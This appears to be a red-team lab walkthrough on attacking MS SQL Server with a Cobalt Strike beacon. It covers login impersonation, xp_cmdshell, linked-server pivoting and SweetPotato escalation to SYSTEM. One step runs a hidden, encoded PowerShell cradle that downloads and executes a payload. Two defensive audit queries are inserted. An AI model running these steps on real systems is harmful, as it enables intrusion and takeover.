Microsoft SQL Server is a relational database that runs on Windows and is commonly used to support business applications. Beyond that role, SQL Server presents a very large attack surface, including command execution, privilege escalation, lateral movement and persistence.
PowerUpSQL and SQLRecon are two excellent tools for interacting with SQL Server.
Get-SQLInstanceDomain works by searching the domain for SPNs that begin with MSSQL.
The output below shows that SQL-2 is running SQL Server and that the service runs as the mssql_svc domain account.
beacon> powershell-import C:\Tools\PowerUpSQL\PowerUpSQL.ps1
beacon> powershell Get-SQLInstanceDomain

ComputerName : sql-2.dev.cyberbotic.io
Instance : sql-2.dev.cyberbotic.io,1433
DomainAccountSid : 1500000521000672332383313895871914512914091400
DomainAccount : mssql_svc
DomainAccountCn : MS SQL Service
Service : MSSQLSvc
Spn : MSSQLSvc/sql-2.dev.cyberbotic.io:1433
LastLogon : 8/15/2022 7:55 PM
Description :
Get-SQLConnectionTest can be used to test whether we are able to connect to the instance.
beacon> powershell Get-SQLConnectionTest -Instance "sql-2.dev.cyberbotic.io,1433" | fl

ComputerName : sql-2.dev.cyberbotic.io
Instance : sql-2.dev.cyberbotic.io,1433
Status : Accessible
Get-SQLServerInfo can be used to gather more information about the instance.
beacon> powershell Get-SQLServerInfo -Instance "sql-2.dev.cyberbotic.io,1433"

ComputerName : sql-2.dev.cyberbotic.io
Instance : SQL-2
DomainName : DEV
ServiceProcessID : 2668
ServiceName : MSSQLSERVER
ServiceAccount : DEV\mssql_svc
AuthenticationMode : Windows Authentication
ForcedEncryption : 0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Standard Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : DEV\bfarmer
IsSysadmin : No
ActiveSessions : 1
The following pipeline collects this information across multiple instances at once:
powershell Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
SQLRecon can determine which privileges our current user holds on the instance.
beacon> execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m whoami

[+] Logged in as:
DEV\bfarmer
[+] Mapped to the user:
guest
[+] Roles:
User is a member of public role
User is NOT a member of db_owner role
User is NOT a member of db_accessadmin role
User is NOT a member of db_securityadmin role
User is NOT a member of db_ddladmin role
User is NOT a member of db_backupoperator role
User is NOT a member of db_datareader role
User is NOT a member of db_datawriter role
User is NOT a member of db_denydatareader role
User is NOT a member of db_denydatawriter role
User is NOT a member of sysadmin role
User is NOT a member of setupadmin role
User is NOT a member of serveradmin role
User is NOT a member of securityadmin role
User is NOT a member of processadmin role
User is NOT a member of diskadmin role
User is NOT a member of dbcreator role
User is NOT a member of bulkadmin role
MS SQL allows us to act under another login's permissions without knowing that login's password, provided the IMPERSONATE permission has been granted. Such grants can be found by querying the server permissions:
SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE';
Then look up the principal IDs for more detail:
SELECT name, principal_id, type_desc, is_disabled FROM sys.server_principals;
SQLRecon can also enumerate impersonation on a SQL Server.
beacon> execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m impersonate

[+] Enumerating accounts that can be impersonated on sql-2.dev.cyberbotic.io,1433:
name |
-------
DEV\mssql_svc |
Use it directly with EXECUTE AS:
EXECUTE AS login = 'DEV\mssql_svc'; SELECT SYSTEM_USER;
DEV\mssql_svc

EXECUTE AS login = 'DEV\mssql_svc'; SELECT IS_SRVROLEMEMBER('sysadmin');
1
SQLRecon's -i parameter performs the same impersonation:
beacon> execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m iwhoami -i DEV\mssql_svc

[+] Logged in as:
DEV\mssql_svc
[+] Mapped to the user:
dbo
[+] Roles:
User is a member of public role
User is a member of sysadmin role
User is a member of setupadmin role
User is a member of serveradmin role
User is a member of securityadmin role
User is a member of processadmin role
User is a member of diskadmin role
User is a member of dbcreator role
User is a member of bulkadmin role
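The two queries above answer "who can impersonate whom" in two steps; the audit query below (added here, not part of the original article or of PowerUpSQL/SQLRecon) joins them, flags every IMPERSONATE grant whose target is a sysadmin login (which is what makes the DEV\mssql_svc case dangerous), and emits the matching REVOKE statement for review. It assumes only that it is run by a login allowed to read sys.server_permissions.

```sql
-- Audit: server-level IMPERSONATE grants and where they lead.
-- Added example; the column names are the real sys.* catalog columns,
-- the risk logic and the suggested_revoke text are this example's own.
SELECT
    grantee.name                                   AS grantee_login,
    p.permission_name,
    p.state_desc,
    COALESCE(target.name, N'<any login>')          AS impersonated_login,
    target.type_desc                               AS impersonated_type,
    target.is_disabled                             AS impersonated_disabled,
    IS_SRVROLEMEMBER('sysadmin', target.name)      AS impersonated_is_sysadmin,
    -- Ready-to-review revoke for grants that reach sysadmin (or any login).
    CASE WHEN IS_SRVROLEMEMBER('sysadmin', target.name) = 1
              OR p.permission_name = 'IMPERSONATE ANY LOGIN'
         THEN N'REVOKE ' + p.permission_name
              + CASE WHEN target.name IS NOT NULL
                     THEN N' ON LOGIN::' + QUOTENAME(target.name)
                     ELSE N'' END
              + N' FROM ' + QUOTENAME(grantee.name) + N';'
    END                                            AS suggested_revoke
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee
  ON grantee.principal_id = p.grantee_principal_id
-- IMPERSONATE on a specific login is class SERVER_PRINCIPAL with
-- major_id = that login; IMPERSONATE ANY LOGIN has no target row.
LEFT JOIN sys.server_principals AS target
  ON p.class_desc = 'SERVER_PRINCIPAL'
 AND target.principal_id = p.major_id
WHERE p.permission_name IN ('IMPERSONATE', 'IMPERSONATE ANY LOGIN')
  AND p.state_desc IN ('GRANT', 'GRANT_WITH_GRANT_OPTION')
ORDER BY impersonated_is_sysadmin DESC, grantee_login;
```

Rows with impersonated_is_sysadmin = 1 are exactly the grants that turn a low-privilege login such as DEV\bfarmer into a sysadmin with a single EXECUTE AS.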
xp_cmdshell can be used to execute operating-system commands on the SQL Server host when we hold sysadmin privileges. Invoke-SQLOSCmd in PowerUpSQL wraps this.
beacon> powershell Invoke-SQLOSCmd -Instance "sql-2.dev.cyberbotic.io,1433" -Command "whoami" -RawResults

dev\mssql_svc
Enumerate the xp_cmdshell configuration:
SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';
Re-enable xp_cmdshell if it is turned off:
sp_configure 'Show Advanced Options', 1; RECONFIGURE;
sp_configure 'xp_cmdshell', 1; RECONFIGURE;
SQL Server can fetch data from other MS SQL Servers through linked servers. Link information can be obtained with:
SELECT srvname, srvproduct, rpcout FROM master..sysservers;
Query a link with OPENQUERY:
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');
Check xp_cmdshell over the link:
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''');
Enable it remotely as follows:
EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
Get-SQLServerLinkCrawl in PowerUpSQL crawls the links reachable from an instance:
beacon> powershell Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433"

Version : SQL Server 2019
Instance : SQL-2
CustomQuery :
Sysadmin : 1
Path : {SQL-2}
User : DEV\bfarmer
Links : {SQL-1.CYBERBOTIC.IO}

Version : SQL Server 2019
Instance : SQL-1
CustomQuery :
Sysadmin : 1
Path : {SQL-2, SQL-1.CYBERBOTIC.IO}
User : sa
Links :
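The crawl above shows why the link matters: SQL-2 reaches SQL-1 with a fixed remote login of sa and RPC OUT enabled, so EXEC ... AT runs as sysadmin on the far side. The audit query below (added here, not part of the original article or PowerUpSQL) lists every linked server, its RPC OUT / data access settings and the remote login each local principal is mapped to, using the modern sys.servers and sys.linked_logins views instead of the legacy master..sysservers. The risk labels and the generated sp_serveroption statement are this example's own.

```sql
-- Audit: linked servers and the remote security context they grant.
-- Added example; column names are the real catalog columns.
SELECT
    s.name                                           AS link_name,
    s.product, s.provider, s.data_source,
    s.is_rpc_out_enabled,                            -- needed for EXEC ... AT
    s.is_data_access_enabled,                        -- needed for OPENQUERY
    -- local_principal_id = 0 is the default mapping that applies to all logins
    COALESCE(lp.name, N'<all logins>')               AS local_login,
    CASE WHEN ll.uses_self_credential = 1 THEN N'<self (pass-through)>'
         WHEN ll.remote_name IS NULL        THEN N'<no access>'
         ELSE ll.remote_name END                     AS remote_login,
    CASE WHEN s.is_rpc_out_enabled = 1
              AND ll.uses_self_credential = 0
              AND ll.remote_name = N'sa'            THEN N'HIGH: fixed sa context + RPC OUT'
         WHEN s.is_rpc_out_enabled = 1               THEN N'MEDIUM: remote EXEC allowed'
         WHEN ll.uses_self_credential = 0
              AND ll.remote_name IS NOT NULL         THEN N'MEDIUM: fixed remote login'
         ELSE N'LOW' END                             AS risk,
    -- Hardening statement for review: turn off RPC OUT on the link.
    N'EXEC sp_serveroption ' + QUOTENAME(s.name, '''')
        + N', ''rpc out'', ''false'';'               AS disable_rpc_out
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll
  ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS lp
  ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.is_rpc_out_enabled DESC, link_name, local_login;
```

Only sa is matched by name here; whether another fixed remote login is sysadmin can only be confirmed by querying the remote instance, so treat every fixed mapping as worth a manual check.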
The examples here run in the context of the SQL Server service account, which holds SeImpersonatePrivilege; this privilege allows a process to impersonate a client once that client has authenticated to it.
beacon> getuid
[*] You are NT Service\MSSQLSERVER

beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe TokenPrivileges
====== TokenPrivileges ======
Current Token's Privileges
SeAssignPrimaryTokenPrivilege: DISABLED
SeIncreaseQuotaPrivilege: DISABLED
SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeIncreaseWorkingSetPrivilege: DISABLED

[*] Completed collection in 0.037 seconds
But because this service account is not a local administrator, it cannot simply open the SYSTEM processes already running on the host. One approach is to coerce a system service into authenticating to a malicious service controlled by the attacker; that service then ends up with a SYSTEM token. SweetPotato implements this. Here it uses the print spooler (PrintSpoofer) method and is run via execute-assembly.
beacon> execute-assembly C:\Tools\SweetPotato\bin\Release\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAGMAJwApAA=="

SweetPotato by @_EthicalChaos_
Orignal RottenPotato code and exploit by @foxglovesec
Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by @itm4n
EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] Attempting NP impersonation using method PrintSpoofer to launch C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
[+] Triggering notification on evil PIPE \\sql-1/pipe/b888d569-b66e-4280-b8c5-995afbb9b02c
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

beacon> connect localhost 4444
[+] established link to child beacon: 10.10.120.25